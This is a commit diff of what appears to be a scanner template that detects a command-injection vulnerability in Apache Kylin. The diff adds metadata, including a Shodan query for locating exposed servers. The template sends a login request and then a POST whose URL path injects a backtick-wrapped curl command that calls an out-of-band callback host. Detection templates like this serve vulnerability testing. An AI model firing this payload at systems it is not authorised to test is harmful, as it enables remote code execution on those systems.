minor update
parent
8e0c99bf5f
commit
14f099fc68
|
@ -18,6 +18,10 @@ info:
|
|||
cwe-id: CWE-78
|
||||
epss-score: 0.97262
|
||||
cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 2
|
||||
verified: "true"
|
||||
shodan-query: http.favicon.hash:-186961397
|
||||
tags: cve,cve2020,apache,kylin,rce,oast,kev
|
||||
|
||||
variables:
|
||||
|
@ -30,11 +34,12 @@ http:
|
|||
POST /kylin/api/user/authentication HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}
|
||||
|
||||
- |
|
||||
POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 0
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
Loading…
Reference in New Issue